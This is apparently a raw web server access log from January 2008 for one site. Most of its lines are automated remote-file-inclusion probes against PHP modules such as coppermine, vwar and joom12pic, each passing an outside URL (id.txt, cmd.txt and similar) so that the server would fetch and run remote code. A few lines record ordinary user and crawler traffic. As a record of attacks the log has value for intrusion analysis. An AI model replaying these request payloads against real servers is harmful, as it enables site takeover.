206.220.64.3 - - [15/Jan/2008:12:02:00 -0800] "GET /logs/access_071229.log/100http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.220.64.3 - - [15/Jan/2008:12:02:01 -0800] "GET /logs/100http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.26.174.67 - - [15/Jan/2008:12:02:12 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://asterweb.com.br/cav/s.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
213.134.106.197 - - [15/Jan/2008:12:03:54 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rltrac.com/newsletter/wp-content/themes/themesID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.67.153.114 - - [15/Jan/2008:12:04:02 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.26.174.67 - - [15/Jan/2008:12:04:08 -0800] "GET /logs/access_071221.log/shopping/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://asterweb.com.br/cav/s.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
69.59.21.251 - - [15/Jan/2008:12:07:48 -0800] "GET /logs/access_071205.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.70.35.179 - - [15/Jan/2008:12:07:59 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.dmulk.com"
207.172.239.6 - - [15/Jan/2008:12:10:50 -0800] "GET /logs/access_071124.log HTTP/1.1" 200 55613 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
128.241.20.83 - - [15/Jan/2008:12:10:51 -0800] "GET /logs/access_071124.log HTTP/1.1" 200 55613 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" "www.dmulk.com"
72.15.196.106 - - [15/Jan/2008:12:12:30 -0800] "GET /logs/access_071205.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://barza.us/images/norm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [15/Jan/2008:12:14:28 -0800] "GET /logs/access_071229.log//login.php?dir=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.160.203.190 - - [15/Jan/2008:12:14:28 -0800] "GET //login.php?dir=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.160.203.190 - - [15/Jan/2008:12:14:28 -0800] "GET /logs//login.php?dir=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.6.8.71 - - [15/Jan/2008:12:14:50 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.71 - - [15/Jan/2008:12:14:51 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
125.251.147.130 - - [15/Jan/2008:12:15:56 -0800] "GET /logs/access_071225.log//modules/TotalCalendar/about.php?inc_dir=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.251.147.130 - - [15/Jan/2008:12:15:56 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.251.147.130 - - [15/Jan/2008:12:15:57 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.251.147.130 - - [15/Jan/2008:12:16:06 -0800] "GET /logs/access_071225.log//modules/TotalCalendar/about.php?inc_dir=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.251.147.130 - - [15/Jan/2008:12:16:06 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.251.147.130 - - [15/Jan/2008:12:16:07 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.18.66 - - [15/Jan/2008:12:16:36 -0800] "GET /logs/access_071229.log//login.php?dir=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [15/Jan/2008:12:16:36 -0800] "GET //login.php?dir=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [15/Jan/2008:12:16:37 -0800] "GET /logs//login.php?dir=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.189.4.131 - - [15/Jan/2008:12:17:22 -0800] "GET /1000http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.170.162 - - [15/Jan/2008:12:19:05 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.8.232.250 - warboard [15/Jan/2008:12:20:20 -0800] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=577 HTTP/1.1" 200 7608 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [15/Jan/2008:12:20:21 -0800] "GET /warboard/css/styles_screen.css HTTP/1.1" 200 5617 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=577" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [15/Jan/2008:12:20:22 -0800] "GET /warboard/css/styles_print.css HTTP/1.1" 200 962 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=577" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - - [15/Jan/2008:12:20:23 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
82.146.33.175 - - [15/Jan/2008:12:20:35 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/errors.php?error=http://politics.wwf.gr/help/css/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.33.175 - - [15/Jan/2008:12:20:36 -0800] "GET /administrator/components/com_joom12pic/errors.php?error=http://politics.wwf.gr/help/css/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.33.175 - - [15/Jan/2008:12:20:36 -0800] "GET /logs/administrator/components/com_joom12pic/errors.php?error=http://politics.wwf.gr/help/css/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.8.232.250 - warboard [15/Jan/2008:12:20:44 -0800] "POST /warboard/index.php?table_name=warboard_main&page=0&function=update&where_field=dataid&where_value=577 HTTP/1.1" 302 2906 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=577" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [15/Jan/2008:12:20:45 -0800] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=577&just_updated=1 HTTP/1.1" 200 7650 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=577" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
85.214.46.118 - - [15/Jan/2008:12:20:46 -0800] "GET /logs/access.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.46.118 - - [15/Jan/2008:12:20:47 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.46.118 - - [15/Jan/2008:12:20:47 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.46.118 - - [15/Jan/2008:12:20:48 -0800] "GET /logs/access_071229.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.8.232.250 - warboard [15/Jan/2008:12:20:52 -0800] "GET /warboard/index.php?table_name=warboard_main HTTP/1.1" 200 32998 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=577&just_updated=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [15/Jan/2008:12:20:55 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC HTTP/1.1" 200 32960 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [15/Jan/2008:12:20:59 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 33141 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
87.106.183.104 - - [15/Jan/2008:12:21:43 -0800] "GET /logs/access.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.183.104 - - [15/Jan/2008:12:21:44 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.183.104 - - [15/Jan/2008:12:21:44 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.183.104 - - [15/Jan/2008:12:21:45 -0800] "GET /logs/access_071229.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.92.82 - - [15/Jan/2008:12:21:55 -0800] "GET /logs/access.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.92.82 - - [15/Jan/2008:12:21:56 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.92.82 - - [15/Jan/2008:12:21:56 -0800] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.92.82 - - [15/Jan/2008:12:21:57 -0800] "GET /logs/access_071229.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.188 - - [15/Jan/2008:12:24:13 -0800] "GET /logs/access_071109.log/administrator/components/com_joom12pic/errors.php?error=http://politics.wwf.gr/help/css/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.188 - - [15/Jan/2008:12:24:13 -0800] "GET /administrator/components/com_joom12pic/errors.php?error=http://politics.wwf.gr/help/css/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.188 - - [15/Jan/2008:12:24:14 -0800] "GET /logs/administrator/components/com_joom12pic/errors.php?error=http://politics.wwf.gr/help/css/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.203.211 - - [15/Jan/2008:12:25:18 -0800] "GET /logs/access.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.203.211 - - [15/Jan/2008:12:25:22 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.203.211 - - [15/Jan/2008:12:25:24 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.203.211 - - [15/Jan/2008:12:26:11 -0800] "GET /logs/access_071220.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.31.186.231 - - [15/Jan/2008:12:28:14 -0800] "GET //login.php?dir=http://lovefromsenpai.com/anime/images/banners/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.242.3.251 - - [15/Jan/2008:12:28:45 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.242.3.251 - - [15/Jan/2008:12:28:46 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.242.3.251 - - [15/Jan/2008:12:28:46 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
74.6.20.136 - - [15/Jan/2008:12:29:39 -0800] "GET /logs/access_070925.log HTTP/1.0" 200 516 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.242.3.251 - - [15/Jan/2008:12:29:50 -0800] "GET /logs/access_071228.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
87.117.233.130 - - [15/Jan/2008:12:29:57 -0800] "GET //plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
87.117.233.130 - - [15/Jan/2008:12:29:57 -0800] "GET /logs//plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
87.117.233.130 - - [15/Jan/2008:12:30:51 -0800] "GET //plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
87.117.233.130 - - [15/Jan/2008:12:30:51 -0800] "GET /logs//plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
195.242.3.251 - - [15/Jan/2008:12:32:02 -0800] "GET /logs/access_071222.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.242.3.251 - - [15/Jan/2008:12:32:02 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.242.3.251 - - [15/Jan/2008:12:32:03 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.242.3.251 - - [15/Jan/2008:12:33:09 -0800] "GET /logs/access_071228.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
125.251.147.130 - - [15/Jan/2008:12:33:41 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.251.147.130 - - [15/Jan/2008:12:33:41 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.251.147.130 - - [15/Jan/2008:12:33:41 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.251.147.130 - - [15/Jan/2008:12:33:42 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.251.147.130 - - [15/Jan/2008:12:33:42 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.251.147.130 - - [15/Jan/2008:12:33:42 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.30.179.203 - - [15/Jan/2008:12:35:08 -0800] "GET /logs/access_071022.log HTTP/1.0" 200 18527 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.117.233.130 - - [15/Jan/2008:12:36:50 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
87.117.233.130 - - [15/Jan/2008:12:36:51 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
89.110.156.59 - - [15/Jan/2008:12:39:24 -0800] "GET //components/minibb/index.php?absolute_path=http://geocities.com/carneline0817/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.44.188.10 - - [15/Jan/2008:12:40:16 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
207.44.188.10 - - [15/Jan/2008:12:40:16 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
89.110.156.59 - - [15/Jan/2008:12:41:22 -0800] "GET /logs/access_071229.log//components/minibb/index.php?absolute_path=http://geocities.com/carneline0817/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.110.156.59 - - [15/Jan/2008:12:41:23 -0800] "GET /logs//components/minibb/index.php?absolute_path=http://geocities.com/carneline0817/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.160.203.190 - - [15/Jan/2008:12:42:07 -0800] "GET /logs/access_071222.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.160.203.190 - - [15/Jan/2008:12:42:07 -0800] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.160.203.190 - - [15/Jan/2008:12:42:07 -0800] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
89.174.96.200 - - [15/Jan/2008:12:42:44 -0800] "GET //skin/zero_vote/error.php?dir=http://kewlnet.int.pl/~laryflynt/.cd/spread.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.125.203.211 - - [15/Jan/2008:12:43:12 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.203.211 - - [15/Jan/2008:12:43:19 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.203.211 - - [15/Jan/2008:12:43:24 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.238.199.66 - - [15/Jan/2008:12:44:22 -0800] "GET /logs/access_071222.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.238.199.66 - - [15/Jan/2008:12:44:22 -0800] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.238.199.66 - - [15/Jan/2008:12:44:23 -0800] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.18.66 - - [15/Jan/2008:12:44:53 -0800] "GET /logs/access_071222.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [15/Jan/2008:12:44:53 -0800] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [15/Jan/2008:12:44:54 -0800] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://lovefromsenpai.com/anime/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.233.130 - - [15/Jan/2008:12:46:42 -0800] "GET /logs/modules/links/submit_links.php?rootdp=zZz&gsLanguage=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
87.117.233.130 - - [15/Jan/2008:12:46:43 -0800] "GET /modules/links/submit_links.php?rootdp=zZz&gsLanguage=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
216.246.48.124 - - [15/Jan/2008:12:48:28 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/mayam_anay/vaksin? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.48.124 - - [15/Jan/2008:12:48:28 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/mayam_anay/vaksin? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.189.4.131 - - [15/Jan/2008:12:49:03 -0800] "GET /logs/access.log/1000http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.189.4.131 - - [15/Jan/2008:12:49:04 -0800] "GET /logs/1000http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.251.147.130 - - [15/Jan/2008:12:52:18 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.251.147.130 - - [15/Jan/2008:12:52:19 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.251.147.130 - - [15/Jan/2008:12:52:20 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
